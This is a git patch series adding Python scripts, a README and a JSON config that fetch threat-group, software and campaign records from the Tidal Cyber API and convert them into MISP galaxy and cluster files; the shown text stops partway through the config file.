From a33e9e2a140d5ea8f90ef3d80d2f3157dc9fd332 Mon Sep 17 00:00:00 2001 From: niclas Date: Mon, 19 Feb 2024 11:30:10 +0100 Subject: [PATCH 01/49] Add [tidal] scipts to create new galaxies --- tools/tidal-api/api.py | 15 ++++++ tools/tidal-api/create_campaigns.py | 62 ++++++++++++++++++++++++ tools/tidal-api/create_groups.py | 73 +++++++++++++++++++++++++++++ tools/tidal-api/create_software.py | 73 +++++++++++++++++++++++++++++ 4 files changed, 223 insertions(+) create mode 100644 tools/tidal-api/api.py create mode 100644 tools/tidal-api/create_campaigns.py create mode 100644 tools/tidal-api/create_groups.py create mode 100644 tools/tidal-api/create_software.py diff --git a/tools/tidal-api/api.py b/tools/tidal-api/api.py new file mode 100644 index 0000000..0e313f6 --- /dev/null +++ b/tools/tidal-api/api.py @@ -0,0 +1,15 @@ +import requests + +class TidalAPI: + def __init__(self): + self.base_url = 'https://app-api.tidalcyber.com/api/v1/' + + def get_data(self, endpoint): + url = self.base_url + endpoint + try: + response = requests.get(url) + return response.json() + except Exception as e: + print(f'Error: {e}') + return None + diff --git a/tools/tidal-api/create_campaigns.py b/tools/tidal-api/create_campaigns.py new file mode 100644 index 0000000..9604361 --- /dev/null +++ b/tools/tidal-api/create_campaigns.py @@ -0,0 +1,62 @@ +from api import TidalAPI +import json + +VERSION = 1 +GALAXY_PATH = "../../galaxies/" +CLUSTER_PATH = "../../clusters/" +GALAXY_UUID = "43a8fce6-08d3-46c2-957d-53606efe2c48" + +def create_galaxy(): + galaxy = {} + galaxy["description"] = "Tidal Campaigns Galaxy" + galaxy["name"] = "Tidal Campaigns" + galaxy["namespace"] = "tidal" + galaxy["type"] = "campaigns" + galaxy["uuid"] = GALAXY_UUID + galaxy["version"] = VERSION + return galaxy + +def create_cluster(galaxy, data): + cluster = {} + values = [] + + for campaigns in data["data"]: + value = {} + relations = [] + + value["description"] = campaigns["description"] + + value["meta"] = {} + value["meta"]["source"] = campaigns["source"] + value["meta"]["campaign-attack-id"] = campaigns["campaign_attack_id"] + value["meta"]["first-seen"] = campaigns["first_seen"] + value["meta"]["last-seen"] = campaigns["last_seen"] + value["meta"]["tags"] = campaigns["tags"] + value["meta"]["owner"] = campaigns["owner_name"] + + value["related"] = relations + value["uuid"] = campaigns["id"] + value["value"] = campaigns["name"] + values.append(value) + + cluster["authors"] = ["Tidal"] + cluster["category"] = "Threat campaigns" + cluster["description"] = "Tidal Campaigns" + cluster["name"] = "Tidal Campaigns" + cluster["source"] = "https://app-api.tidalcyber.com/api/v1/campaigns" + cluster["type"] = "campaigns" + cluster["uuid"] = galaxy["uuid"] + cluster["values"] = values + return cluster + +if __name__ == "__main__": + api = TidalAPI() + data = api.get_data('campaigns') + galaxy = create_galaxy() + cluster = create_cluster(galaxy, data) + + with open(GALAXY_PATH + "tidal-campaigns.json", "w") as galaxy_file: + json.dump(galaxy, galaxy_file, indent=4) + + with open(CLUSTER_PATH + "tidal-campaigns.json", "w") as cluster_file: + json.dump(cluster, cluster_file, indent=4) diff --git a/tools/tidal-api/create_groups.py b/tools/tidal-api/create_groups.py new file mode 100644 index 0000000..940053a --- /dev/null +++ b/tools/tidal-api/create_groups.py @@ -0,0 +1,73 @@ +from api import TidalAPI +import json + +VERSION = 1 +GALAXY_PATH = "../../galaxies/" +CLUSTER_PATH = "../../clusters/" +GALAXY_UUID = "41c3e5c0-de5c-4edb-b48b-48cd8e7519e6" + +def create_galaxy(): + galaxy = {} + galaxy["description"] = "Tidal Threat Group Galaxy" + galaxy["name"] = "Tidal Threat Group" + galaxy["namespace"] = "tidal" + galaxy["type"] = "threat-group" + galaxy["uuid"] = GALAXY_UUID + galaxy["version"] = VERSION + return galaxy + + +def create_cluster(galaxy, data): + cluster = {} + values = [] + + for group in data["data"]: + value = {} + relations = [] + # TODO check for id and associated_group_id and add to relations + for entry in group["associated_groups"]: + relation = {} + relation["dest-uuid"] = entry["id"] + relation["type"] = "related-to" + relations.append(relation) + + value["description"] = group["description"] + + value["meta"] = {} + value["meta"]["source"] = group["source"] + value["meta"]["group-attack-id"] = group["group_attack_id"] + value["meta"]["country"] = [country["country_code"] for country in group["country"]] + value["meta"]["observed_country"] = [country["country_code"] for country in group["observed_country"]] + value["meta"]["motive"] = [motive["name"] for motive in group["observed_motivation"]] + value["meta"]["target-category"] = [sector["name"] for sector in group["observed_sector"]] + value["meta"]["tags"] = group["tags"] + value["meta"]["owner"] = group["owner_name"] + + value["related"] = relations + value["uuid"] = group["id"] + value["value"] = group["name"] + values.append(value) + + cluster["authors"] = ["Tidal"] + cluster["category"] = "Threat Group" + cluster["description"] = "Tidal Threat Groups" + cluster["name"] = "Tidal Threat Group" + cluster["source"] = "https://app-api.tidalcyber.com/api/v1/groups" + cluster["type"] = "threat-group" + cluster["uuid"] = galaxy["uuid"] + cluster["values"] = values + return cluster + + +if __name__ == "__main__": + + api = TidalAPI() + data = api.get_data("groups") + galaxy = create_galaxy() + cluster = create_cluster(galaxy, data) + + with open(GALAXY_PATH + "tidal-threat-group.json", "w") as galaxy_file: + json.dump(galaxy, galaxy_file, indent=4) + + with open(CLUSTER_PATH + "tidal-threat-group.json", "w") as cluster_file: + json.dump(cluster, cluster_file, indent=4) \ No newline at end of file diff --git a/tools/tidal-api/create_software.py b/tools/tidal-api/create_software.py new file mode 100644 index 0000000..1219c21 --- /dev/null +++ b/tools/tidal-api/create_software.py @@ -0,0 +1,73 @@ +from api import TidalAPI +import json + +VERSION = 1 +GALAXY_PATH = "../../galaxies/" +CLUSTER_PATH = "../../clusters/" +GALAXY_UUID = "38d62d8b-4c49-489a-9bc4-8e294c4f04f7" + +def create_galaxy(): + galaxy = {} + galaxy["description"] = "Tidal Software Galaxy" + galaxy["name"] = "Tidal Software" + galaxy["namespace"] = "tidal" + galaxy["type"] = "software" + galaxy["uuid"] = GALAXY_UUID + galaxy["version"] = VERSION + return galaxy + +def create_cluster(galaxy, data): + cluster = {} + values = [] + + for software in data["data"]: + value = {} + relations = [] + # TODO check for relations etc. + for entry in software["groups"]: + relation = {} + relation["dest-uuid"] = entry["id"] + relation["type"] = "used-by" + relations.append(relation) + for entry in software["associated_software"]: + relation = {} + relation["dest-uuid"] = entry["id"] + relation["type"] = "related-to" + relations.append(relation) + + value["description"] = software["description"] + + value["meta"] = {} + value["meta"]["source"] = software["source"] + value["meta"]["type"] = software["type"] + value["meta"]["software-attack-id"] = software["software_attack_id"] + value["meta"]["platforms"] = software["platforms"] + value["meta"]["tags"] = software["tags"] + value["meta"]["owner"] = software["owner_name"] + + value["related"] = relations + value["uuid"] = software["id"] + value["value"] = software["name"] + values.append(value) + + cluster["authors"] = ["Tidal"] + cluster["category"] = "Threat software" + cluster["description"] = "Tidal Threat Groups" + cluster["name"] = "Tidal Threat software" + cluster["source"] = "https://app-api.tidalcyber.com/api/v1/software" + cluster["type"] = "threat-software" + cluster["uuid"] = galaxy["uuid"] + cluster["values"] = values + return cluster + +if __name__ == "__main__": + api = TidalAPI() + data = api.get_data('software') + galaxy = create_galaxy() + cluster = create_cluster(galaxy, data) + + with open(GALAXY_PATH + "tidal-software.json", "w") as galaxy_file: + json.dump(galaxy, galaxy_file, indent=4) + + with open(CLUSTER_PATH + "tidal-software.json", "w") as cluster_file: + json.dump(cluster, cluster_file, indent=4) \ No newline at end of file From 059de052ad43114558bd594fb9c2bf5c35a498f7 Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 20 Feb 2024 11:56:55 +0100 Subject: [PATCH 02/49] chg [tidal] only generate set metadata --- tools/tidal-api/create_campaigns.py | 26 +++++++++++++++++----- tools/tidal-api/create_groups.py | 34 ++++++++++++++++++++++------- tools/tidal-api/create_software.py | 26 +++++++++++++++++----- 3 files changed, 66 insertions(+), 20 deletions(-) diff --git a/tools/tidal-api/create_campaigns.py b/tools/tidal-api/create_campaigns.py index 9604361..8b6123c 100644 --- a/tools/tidal-api/create_campaigns.py +++ b/tools/tidal-api/create_campaigns.py @@ -26,13 +26,27 @@ def create_cluster(galaxy, data): value["description"] = campaigns["description"] + # Metadata fields + source = campaigns["source"] + campaign_attack_id = campaigns["campaign_attack_id"] + first_seen = campaigns["first_seen"] + last_seen = campaigns["last_seen"] + tags = campaigns["tags"] + owner = campaigns["owner_name"] + value["meta"] = {} - value["meta"]["source"] = campaigns["source"] - value["meta"]["campaign-attack-id"] = campaigns["campaign_attack_id"] - value["meta"]["first-seen"] = campaigns["first_seen"] - value["meta"]["last-seen"] = campaigns["last_seen"] - value["meta"]["tags"] = campaigns["tags"] - value["meta"]["owner"] = campaigns["owner_name"] + if source: + value["meta"]["source"] = source + if campaign_attack_id: + value["meta"]["campaign-attack-id"] = campaign_attack_id + if first_seen: + value["meta"]["first-seen"] = first_seen + if last_seen: + value["meta"]["last-seen"] = last_seen + if tags: + value["meta"]["tags"] = tags + if owner: + value["meta"]["owner"] = owner value["related"] = relations value["uuid"] = campaigns["id"] diff --git a/tools/tidal-api/create_groups.py b/tools/tidal-api/create_groups.py index 940053a..163d80f 100644 --- a/tools/tidal-api/create_groups.py +++ b/tools/tidal-api/create_groups.py @@ -33,15 +33,33 @@ def create_cluster(galaxy, data): value["description"] = group["description"] + # Metadata fields + source = group["source"] + group_attack_id = group["group_attack_id"] + country = [country["country_name"] for country in group["country"]] + observed_country = [country["country_code"] for country in group["observed_country"]] + motive = [motive["name"] for motive in group["observed_motivation"]] + target_category = [sector["name"] for sector in group["observed_sector"]] + tags = group["tags"] + owner = group["owner_name"] + value["meta"] = {} - value["meta"]["source"] = group["source"] - value["meta"]["group-attack-id"] = group["group_attack_id"] - value["meta"]["country"] = [country["country_code"] for country in group["country"]] - value["meta"]["observed_country"] = [country["country_code"] for country in group["observed_country"]] - value["meta"]["motive"] = [motive["name"] for motive in group["observed_motivation"]] - value["meta"]["target-category"] = [sector["name"] for sector in group["observed_sector"]] - value["meta"]["tags"] = group["tags"] - value["meta"]["owner"] = group["owner_name"] + if source: + value["meta"]["source"] = source + if group_attack_id: + value["meta"]["group-attack-id"] = group_attack_id + if country: + value["meta"]["country"] = country + if observed_country: + value["meta"]["observed_country"] = observed_country + if motive: + value["meta"]["motive"] = motive + if target_category: + value["meta"]["target-category"] = target_category + if tags: + value["meta"]["tags"] = tags + if owner: + value["meta"]["owner"] = owner value["related"] = relations value["uuid"] = group["id"] diff --git a/tools/tidal-api/create_software.py b/tools/tidal-api/create_software.py index 1219c21..9cebad3 100644 --- a/tools/tidal-api/create_software.py +++ b/tools/tidal-api/create_software.py @@ -37,13 +37,27 @@ def create_cluster(galaxy, data): value["description"] = software["description"] + # Metadata fields + source = software["source"] + type = software["type"] + software_attack_id = software["software_attack_id"] + platforms = software["platforms"] + tags = software["tags"] + owner = software["owner_name"] + value["meta"] = {} - value["meta"]["source"] = software["source"] - value["meta"]["type"] = software["type"] - value["meta"]["software-attack-id"] = software["software_attack_id"] - value["meta"]["platforms"] = software["platforms"] - value["meta"]["tags"] = software["tags"] - value["meta"]["owner"] = software["owner_name"] + if source: + value["meta"]["source"] = source + if type: + value["meta"]["type"] = type + if software_attack_id: + value["meta"]["software-attack-id"] = software_attack_id + if platforms: + value["meta"]["platforms"] = platforms + if tags: + value["meta"]["tags"] = tags + if owner: + value["meta"]["owner"] = owner value["related"] = relations value["uuid"] = software["id"] From 108e43e1ca9574c78f98a2d771ff7099e1ac5d9b Mon Sep 17 00:00:00 2001 From: niclas Date: Wed, 21 Feb 2024 16:24:48 +0100 Subject: [PATCH 03/49] Refactor [creation] script --- tools/tidal-api/api/__init__.py | 0 tools/tidal-api/{ => api}/api.py | 0 tools/tidal-api/create_groups.py | 4 +- tools/tidal-api/create_software.py | 19 +++ tools/tidal-api/main.py | 218 +++++++++++++++++++++++++++++ tools/tidal-api/models/__init__.py | 0 tools/tidal-api/models/cluster.py | 23 +++ tools/tidal-api/models/galaxy.py | 14 ++ tools/tidal-api/utils/__init__.py | 0 tools/tidal-api/utils/extractor.py | 6 + 10 files changed, 282 insertions(+), 2 deletions(-) create mode 100644 tools/tidal-api/api/__init__.py rename tools/tidal-api/{ => api}/api.py (100%) create mode 100644 tools/tidal-api/main.py create mode 100644 tools/tidal-api/models/__init__.py create mode 100644 tools/tidal-api/models/cluster.py create mode 100644 tools/tidal-api/models/galaxy.py create mode 100644 tools/tidal-api/utils/__init__.py create mode 100644 tools/tidal-api/utils/extractor.py diff --git a/tools/tidal-api/api/__init__.py b/tools/tidal-api/api/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/tools/tidal-api/api.py b/tools/tidal-api/api/api.py similarity index 100% rename from tools/tidal-api/api.py rename to tools/tidal-api/api/api.py diff --git a/tools/tidal-api/create_groups.py b/tools/tidal-api/create_groups.py index 163d80f..18431a6 100644 --- a/tools/tidal-api/create_groups.py +++ b/tools/tidal-api/create_groups.py @@ -84,8 +84,8 @@ if __name__ == "__main__": galaxy = create_galaxy() cluster = create_cluster(galaxy, data) - with open(GALAXY_PATH + "tidal-threat-group.json", "w") as galaxy_file: + with open(GALAXY_PATH + "tidal-threat-groups.json", "w") as galaxy_file: json.dump(galaxy, galaxy_file, indent=4) - with open(CLUSTER_PATH + "tidal-threat-group.json", "w") as cluster_file: + with open(CLUSTER_PATH + "tidal-threat-groups.json", "w") as cluster_file: json.dump(cluster, cluster_file, indent=4) \ No newline at end of file diff --git a/tools/tidal-api/create_software.py b/tools/tidal-api/create_software.py index 9cebad3..27ff409 100644 --- a/tools/tidal-api/create_software.py +++ b/tools/tidal-api/create_software.py @@ -1,5 +1,6 @@ from api import TidalAPI import json +import re VERSION = 1 GALAXY_PATH = "../../galaxies/" @@ -38,6 +39,7 @@ def create_cluster(galaxy, data): value["description"] = software["description"] # Metadata fields + links = extract_links(software["description"]) source = software["source"] type = software["type"] software_attack_id = software["software_attack_id"] @@ -46,6 +48,8 @@ def create_cluster(galaxy, data): owner = software["owner_name"] value["meta"] = {} + if links: + value["meta"]["refs"] = list(links) if source: value["meta"]["source"] = source if type: @@ -74,6 +78,21 @@ def create_cluster(galaxy, data): cluster["values"] = values return cluster +def extract_links(text): + # extract markdown links and return text without links and the links + # urls = re.findall(r'https?://[^\s\)]+', text) + regular_links = re.findall(r'\[([^\]]+)\]\((https?://[^\s\)]+)\)', text) + # sup_links = re.findall(r'\[\[([^\]]+)\]\((https?://[^\s\)]+)\)\]', text) + + # Extracting URLs from the tuples + regular_links_urls = set([url for text, url in regular_links]) + # sup_links_urls = [url for text, url in sup_links] + + # text_without_links = re.sub(r'\[([^\]]+)\]\(https?://[^\s\)]+\)', r'\1', text) + # text_without_sup = re.sub(r'.*<\/sup>', '', text_without_links) + + return regular_links_urls + if __name__ == "__main__": api = TidalAPI() data = api.get_data('software') diff --git a/tools/tidal-api/main.py b/tools/tidal-api/main.py new file mode 100644 index 0000000..8bf9691 --- /dev/null +++ b/tools/tidal-api/main.py @@ -0,0 +1,218 @@ +from api.api import TidalAPI +from models.galaxy import Galaxy +from models.cluster import Cluster +from utils.extractor import extract_links +import argparse + +CLUSTER_PATH = "../../clusters/" +GALAXY_PATH = "../../galaxies/" + +UUIDS = { + "software": "38d62d8b-4c49-489a-9bc4-8e294c4f04f7", + "groups": "41c3e5c0-de5c-4edb-b48b-48cd8e7519e6", + "campaigns": "43a8fce6-08d3-46c2-957d-53606efe2c48", +} + +GALAXY_CONFIGS = { + "software": { + "name": "Tidal Software", + "namespace": "tidal", + "description": "Tidal Software Galaxy", + "type": "software", + "uuid": UUIDS["software"], + }, + "groups": { + "name": "Tidal Groups", + "namespace": "tidal", + "description": "Tidal Groups Galaxy", + "type": "groups", + "uuid": UUIDS["groups"], + }, + "campaigns": { + "name": "Tidal Campaigns", + "namespace": "tidal", + "description": "Tidal Campaigns Galaxy", + "type": "campaigns", + "uuid": UUIDS["campaigns"], + } +} + +CLUSTER_CONFIGS = { + "software": { + "authors": "Tidal", + "category": "Software", + "description": "Tidal Software Cluster", + "name": "Tidal Software", + "source": "Tidal", + "type": "software", + "uuid": UUIDS["software"], + "values": [] + }, + "groups": { + "authors": "Tidal", + "category": "Threat Groups", + "description": "Tidal Threat Groups Cluster", + "name": "Tidal Threat Groups", + "source": "Tidal", + "type": "groups", + "uuid": UUIDS["groups"], + "values": [] + }, + "campaigns": { + "authors": "Tidal", + "category": "Campaigns", + "description": "Tidal Campaigns Cluster", + "name": "Tidal Campaigns", + "source": "Tidal", + "type": "campaigns", + "uuid": UUIDS["campaigns"], + "values": [] + } +} + +VALUE_FIELDS = { + "software": { + "description": "description", + "meta": { + "source": "source", + "type": "type", + "software-attack-id": "software_attack_id", + "platforms": "platforms", + "tags": "tags", + "owner": "owner_name" + }, + "related": { + "groups": { + "dest-uuid": "group_id", + "type": "used-by" + }, + "associated_software": { + "dest-uuid": "id", + "type": "related-to" + } + }, + "uuid": "id", + "value": "name" + }, + "groups": { + "description": "description", + "meta": { + "source": "source", + "group-attack-id": "group_attack_id", + "country": {"extract": "single", "key": "country", "subkey": "country_code"}, + "observed_country": {"extract": "multiple", "key": "observed_country", "subkey": "country_code"}, + "observed_motivation": {"extract": "multiple", "key": "observed_motivation", "subkey": "name"}, + "target-category": {"extract": "multiple", "key": "observed_sector", "subkey": "name"}, + "tags": "tags", + "owner": "owner_name" + }, + "related": { + "associated_groups": { + "dest-uuid": "id", + "type": "related-to" + } + }, + "uuid": "id", + "value": "name" + }, + "campaigns": { + "description": "description", + "meta": { + "source": "source", + "campaign-attack-id": "campaign_attack_id", + "first_seen": "first_seen", + "last_seen": "last_seen", + "tags": "tags", + "owner": "owner_name" + }, + "related": {}, + "uuid": "id", + "value": "name" + } + +} + +def create_cluster_values(data, cluster): + value_fields = VALUE_FIELDS[cluster.internal_type] + for entry in data["data"]: + values = {} + for key, value in value_fields.items(): + match key: + case "description": + values[value] = entry.get(key) + case "meta": + metadata = create_metadata(entry, value) + values["meta"] = metadata + case "related": + relations = create_relations(entry, value) + values["related"] = relations + case "uuid": + values[key] = entry.get(value) + case "value": + values[key] = entry.get(value) + case _: + print(f"Error: Invalid configuration for {key} in {cluster.internal_type} value fields.") + cluster.add_value(values) + +def create_metadata(data, format): + metadata = {} + for meta_key, meta_value in format.items(): + if isinstance(meta_value, dict): + if meta_value.get("extract") == "single" and data.get(meta_value["key"]): + metadata[meta_key] = data.get(meta_value["key"])[0].get(meta_value["subkey"]) + elif meta_value.get("extract") == "multiple" and data.get(meta_value["key"]): + metadata[meta_key] = [entry.get(meta_value["subkey"]) for entry in data.get(meta_value["key"])] + elif data.get(meta_value): + metadata[meta_key] = data.get(meta_value) + return metadata + + +def create_relations(data, format): + relations = [] + for i in range(len(list(format))): + for relation in data[list(format)[i]]: + relation_entry = {} + for relation_key, relation_value in list(format.values())[i].items(): + if relation_key != "type": + relation_entry[relation_key] = relation.get(relation_value) + else: + relation_entry[relation_key] = relation_value + relations.append(relation_entry) + return relations + + +def create_galaxy_and_cluster(galaxy_type, version): + api = TidalAPI() + galaxy = Galaxy(**GALAXY_CONFIGS[galaxy_type], version=version) + galaxy.save_to_file(f"{GALAXY_PATH}/tidal-{galaxy_type}.json") + + cluster = Cluster(**CLUSTER_CONFIGS[galaxy_type], internal_type=galaxy_type) + data = api.get_data(galaxy_type) + create_cluster_values(data, cluster) + cluster.save_to_file(f"{CLUSTER_PATH}/tidal-{galaxy_type}.json") + + print(f"Galaxy {galaxy_type} created") + +def create_galaxy(args): + if args.all: + for galaxy_type in GALAXY_CONFIGS: + create_galaxy_and_cluster(galaxy_type, args.version) + else: + create_galaxy_and_cluster(args.type, args.version) + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="Create a galaxy and cluster for Tidal API") + subparsers = parser.add_subparsers(dest="command") + + galaxy_parser = subparsers.add_parser("create_galaxy", help="Create a galaxy from the Tidal API") + galaxy_parser.add_argument("--type", choices=list(GALAXY_CONFIGS.keys()) + ['all'], help="The type of the galaxy") + galaxy_parser.add_argument("-v", "--version", type=int, required=True, help="The version of the galaxy") + galaxy_parser.add_argument("--all", action="store_true", help="Flag to create all predefined galaxy types") + galaxy_parser.set_defaults(func=create_galaxy) + + args = parser.parse_args() + if hasattr(args, 'func'): + args.func(args) + else: + parser.print_help() + diff --git a/tools/tidal-api/models/__init__.py b/tools/tidal-api/models/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/tools/tidal-api/models/cluster.py b/tools/tidal-api/models/cluster.py new file mode 100644 index 0000000..2436b89 --- /dev/null +++ b/tools/tidal-api/models/cluster.py @@ -0,0 +1,23 @@ +import json + +class Cluster(): + def __init__(self, authors: str, category: str, description: str, name: str, source: str, type: str, uuid: str, values: list, internal_type: str): + self.authors = authors + self.category = category + self.description = description + self.name = name + self.source = source + self.type = type + self.uuid = uuid + self.values = values + self.internal_type = internal_type + + def add_value(self, value): + self.values.append(value) + + def save_to_file(self, path): + with open(path, "w") as file: + file.write(json.dumps(self.__dict__, indent=4)) + + def get_config(self): + return self.__dict__ diff --git a/tools/tidal-api/models/galaxy.py b/tools/tidal-api/models/galaxy.py new file mode 100644 index 0000000..2de73b2 --- /dev/null +++ b/tools/tidal-api/models/galaxy.py @@ -0,0 +1,14 @@ +import json + +class Galaxy(): + def __init__(self, description, name, namespace, type, uuid, version): + self.description = description + self.name = name + self.namespace = namespace + self.type = type + self.uuid = uuid + self.version = version + + def save_to_file(self, path): + with open(path, "w") as file: + file.write(json.dumps(self.__dict__, indent=4)) diff --git a/tools/tidal-api/utils/__init__.py b/tools/tidal-api/utils/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/tools/tidal-api/utils/extractor.py b/tools/tidal-api/utils/extractor.py new file mode 100644 index 0000000..cfa534e --- /dev/null +++ b/tools/tidal-api/utils/extractor.py @@ -0,0 +1,6 @@ +import re + +def extract_links(text): + links = re.findall(r'\[([^\]]+)\]\((https?://[^\s\)]+)\)', text) + urls = set([url for text, url in links]) + return urls \ No newline at end of file From b9746f2b4155526573aa7a647fd572f4989fe5d9 Mon Sep 17 00:00:00 2001 From: niclas Date: Thu, 22 Feb 2024 10:18:18 +0100 Subject: [PATCH 04/49] chg [config] external config file --- tools/tidal-api/README.md | 67 ++++++++ tools/tidal-api/config.json | 249 ++++++++++++++++++++++++++++ tools/tidal-api/create_campaigns.py | 76 --------- tools/tidal-api/create_groups.py | 91 ---------- tools/tidal-api/create_software.py | 106 ------------ tools/tidal-api/main.py | 133 +-------------- tools/tidal-api/utils/config.py | 14 ++ 7 files changed, 339 insertions(+), 397 deletions(-) create mode 100644 tools/tidal-api/README.md create mode 100644 tools/tidal-api/config.json delete mode 100644 tools/tidal-api/create_campaigns.py delete mode 100644 tools/tidal-api/create_groups.py delete mode 100644 tools/tidal-api/create_software.py create mode 100644 tools/tidal-api/utils/config.py diff --git a/tools/tidal-api/README.md b/tools/tidal-api/README.md new file mode 100644 index 0000000..8e8b992 --- /dev/null +++ b/tools/tidal-api/README.md @@ -0,0 +1,67 @@ +# Tidal Cyber API + +This is a tool generating MISP galaxies and clusters from Tidal Cyber API. + +## Endpoints +https://app-api.tidalcyber.com/api/v1/technique + +https://app-api.tidalcyber.com/api/v1/references + +https://app-api.tidalcyber.com/api/v1/tactic + +https://app-api.tidalcyber.com/api/v1/campaigns/ + +https://app-api.tidalcyber.com/api/v1/software/ + +https://app-api.tidalcyber.com/api/v1/groups/ + +## Configuration +The configuration file is located in `config.json` and maps the fields of the Tidal API to the Galaxy and Cluster fields. It consists of the following sections: +- `UUID`: The UUID of the galaxy to be created +- `GALAXY_CONFIGS`: The configuration of the galaxies to be created in the `galaxies` folder of the MISP-galaxy repository + - `name`: The name of the galaxy + - `namespace`: The namespace of the galaxy + - `description`: The description of the galaxy + - `type`: The type of the galaxy + - `uuid`: The UUID of the galaxy (will be inserted from the `UUID` section) +- `CLUSTER_CONFIGS`: The configuration of the clusters to be created in the `clusters` folder of the MISP-galaxy repository + - `authors`: The authors of the cluster + - `category`: The category of the cluster + - `description`: The description of the cluster + - `name`: The name of the cluster + - `source`: The source of the cluster + - `type`: The type of the cluster + - `uuid`: The UUID of the cluster (will be inserted from the `UUID` section) + - `values`: The values of the cluster (will be inserted from the `VALUE_FIELDS` section) +- `VALUE_FIELDS`: Defines the mapping of the fields in the Tidal Cyber API to the fields in the MISP cluster values array + - `description`: The description of the cluster value + - `meta`: The metadata of the cluster value + - `related`: The related cluster values of the cluster value (you can define a `type` for each relation type in the config which will not be mapped to a field of the API) + - `uuid`: The UUID of the cluster value + - `value`: The value of the cluster value + >Note: The fields `meta` can be formatted as the format of the data the API provides sometimes does not match the format defined by the [MISP galaxy format](https://www.misp-standard.org/rfc/misp-standard-galaxy-format.html#name-conventions-and-terminology). You can configure this using an extraction configuration. + +### Extraction Configuration +The extraction configuration is a dictionary that maps the fields of the Tidal Cyber API to the fields of the MISP galaxy. It can be used to extract data stored in a array or object in the API response. The extraction configuration looks like this: +```json +{ + "extract": , + "key": , + "subkey": +} +``` +**Extract modes**: + +- `single`: Extracts a single value from the API response +- `multiple`: Extracts multiple values from the API response +- `reverse`: Gets the value of the key and writes it into an array (no subkey needed) + +## Usage +```bash +python3 main.py create-galaxy -v --type +``` +To build all galaxies and clusters, run the following command: + +```bash +python3 main.py create-galaxy -v --all +``` \ No newline at end of file diff --git a/tools/tidal-api/config.json b/tools/tidal-api/config.json new file mode 100644 index 0000000..dd50dbe --- /dev/null +++ b/tools/tidal-api/config.json @@ -0,0 +1,249 @@ +{ + "UUIDS": { + "software": "38d62d8b-4c49-489a-9bc4-8e294c4f04f7", + "groups": "41c3e5c0-de5c-4edb-b48b-48cd8e7519e6", + "campaigns": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "technique": "3e28b683-8159-4398-8729-7248eac9aa45", + "tactic": "16a396e2-a4a9-4dfd-be0a-6ba75fb5382c", + "references": "cf5e180f-26e9-42b2-b10c-c9e55f448750" + }, + "GALAXY_CONFIGS": { + "software": { + "name": "Tidal Software", + "namespace": "tidal", + "description": "Tidal Software Galaxy", + "type": "software", + "uuid": "" + }, + "groups": { + "name": "Tidal Groups", + "namespace": "tidal", + "description": "Tidal Groups Galaxy", + "type": "groups", + "uuid": "" + }, + "campaigns": { + "name": "Tidal Campaigns", + "namespace": "tidal", + "description": "Tidal Campaigns Galaxy", + "type": "campaigns", + "uuid": "" + }, + "technique": { + "name": "Tidal Technique", + "namespace": "tidal", + "description": "Tidal Technique Galaxy", + "type": "technique", + "uuid": "" + }, + "tactic": { + "name": "Tidal Tactic", + "namespace": "tidal", + "description": "Tidal Tactic Galaxy", + "type": "tactics", + "uuid": "" + }, + "references": { + "name": "Tidal References", + "namespace": "tidal", + "description": "Tidal References Galaxy", + "type": "references", + "uuid": "" + } + }, + "CLUSTER_CONFIGS": { + "software": { + "authors": "Tidal", + "category": "Software", + "description": "Tidal Software Cluster", + "name": "Tidal Software", + "source": "Tidal", + "type": "software", + "uuid": "", + "values": [] + }, + "groups": { + "authors": "Tidal", + "category": "Threat Groups", + "description": "Tidal Threat Groups Cluster", + "name": "Tidal Threat Groups", + "source": "Tidal", + "type": "groups", + "uuid": "", + "values": [] + }, + "campaigns": { + "authors": "Tidal", + "category": "Campaigns", + "description": "Tidal Campaigns Cluster", + "name": "Tidal Campaigns", + "source": "Tidal", + "type": "campaigns", + "uuid": "", + "values": [] + }, + "technique": { + "authors": "Tidal", + "category": "Techniques", + "description": "Tidal Techniques Cluster", + "name": "Tidal Techniques", + "source": "Tidal", + "type": "technique", + "uuid": "", + "values": [] + }, + "tactic": { + "authors": "Tidal", + "category": "Tactics", + "description": "Tidal Tactics Cluster", + "name": "Tidal Tactics", + "source": "Tidal", + "type": "tactic", + "uuid": "", + "values": [] + }, + "references": { + "authors": "Tidal", + "category": "References", + "description": "Tidal References Cluster", + "name": "Tidal References", + "source": "Tidal", + "type": "references", + "uuid": "", + "values": [] + } + }, + "VALUE_FIELDS": { + "software": { + "description": "description", + "meta": { + "source": "source", + "type": "type", + "software-attack-id": "software_attack_id", + "platforms": "platforms", + "tags": "tags", + "owner": "owner_name" + }, + "related": { + "groups": { + "dest-uuid": "group_id", + "type": "used-by" + }, + "associated_software": { + "dest-uuid": "id", + "type": "related-to" + } + }, + "uuid": "id", + "value": "name" + }, + "groups": { + "description": "description", + "meta": { + "source": "source", + "group-attack-id": "group_attack_id", + "country": { + "extract": "single", + "key": "country", + "subkey": "country_code" + }, + "observed_country": { + "extract": "multiple", + "key": "observed_country", + "subkey": "country_code" + }, + "observed_motivation": { + "extract": "multiple", + "key": "observed_motivation", + "subkey": "name" + }, + "target-category": { + "extract": "multiple", + "key": "observed_sector", + "subkey": "name" + }, + "tags": "tags", + "owner": "owner_name" + }, + "related": { + "associated_groups": { + "dest-uuid": "id", + "type": "related-to" + } + }, + "uuid": "id", + "value": "name" + }, + "campaigns": { + "description": "description", + "meta": { + "source": "source", + "campaign-attack-id": "campaign_attack_id", + "first_seen": "first_seen", + "last_seen": "last_seen", + "tags": "tags", + "owner": "owner_name" + }, + "related": {}, + "uuid": "id", + "value": "name" + }, + "technique": { + "description": "description", + "meta": { + "source": "source", + "platforms": "platforms", + "tags": "tags", + "owner": "owner_name" + }, + "related": { + "tactic": { + "dest-uuid": "tactic_id", + "type": "uses" + }, + "sub_technique": { + "dest-uuid": "id", + "type": "sub-technique-of" + } + }, + "uuid": "id", + "value": "name" + }, + "tactic": { + "description": "description", + "meta": { + "source": "source", + "tactic-attack-id": "tactic_attack_id", + "ordinal_position": "ordinal_position", + "tags": "tags", + "owner": "owner_name" + }, + "related": { + "techniques": { + "dest-uuid": "technique_id", + "type": "uses" + } + }, + "uuid": "id", + "value": "name" + }, + "references": { + "description": "description", + "meta": { + "source": "source", + "refs": { + "extract": "reverse", + "key": "url" + }, + "owner": "owner_name", 